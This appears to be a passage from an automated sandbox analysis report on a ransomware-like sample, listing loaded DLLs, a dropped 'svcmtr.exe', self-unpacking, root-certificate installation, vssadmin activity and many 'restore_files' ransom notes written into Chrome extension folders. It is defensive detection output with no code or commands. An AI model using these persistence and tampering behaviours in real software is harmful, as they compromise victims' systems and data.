Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: credssp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\vssadmin.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: msvfw32.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\svcmtr.exeSection loaded: msvfw32.dll
Source: C:\Windows\System32\notepad.exeSection loaded: version.dll
Source: C:\Windows\System32\notepad.exeSection loaded: dwmapi.dll
Source: C:\Users\user\Desktop\0t8amSU3vd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_2696_1526441409

Data Obfuscation

barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\0t8amSU3vd.exeUnpacked PE file: 0.2.0t8amSU3vd.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 2.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 11.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 12.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Roaming\svcmtr.exeUnpacked PE file: 13.2.svcmtr.exe.400000.1.unpack
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_0042CCB4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042CCB4
Source: C:\Users\user\Desktop\0t8amSU3vd.exeCode function: 0_2_004299E5 push ecx; ret 0_2_004299F8
Source: C:\Users\user\AppData\Roaming\svcmtr.exeCode function: 2_2_004299E5 push ecx; ret 2_2_004299F8
Source: 0t8amSU3vd.exeStatic PE information: section name: .text entropy: 7.771301677112809
Source: svcmtr.exe.0.drStatic PE information: section name: .text entropy: 7.771301677112809

Persistence and Installation Behavior

barindex
Installs new ROOT certificates
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Users\user\Desktop\0t8amSU3vd.exeFile created: C:\Users\user\AppData\Roaming\svcmtr.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ar\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ar\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\bg\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\bg\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ca\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\ca\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\cs\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\cs\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\da\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\de\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\de\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\el\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\el\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_GB\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_GB\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_US\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\en_US\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es_419\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\es_419\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\et\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\et\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fi\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fi\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fil\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fil\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\fr\restore_files_gpmus.txtJump to behavior
